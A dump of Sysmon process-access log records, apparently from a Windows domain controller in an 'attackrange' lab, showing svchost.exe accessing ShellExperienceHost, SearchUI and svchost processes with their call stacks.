07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001046217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\R
PCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\W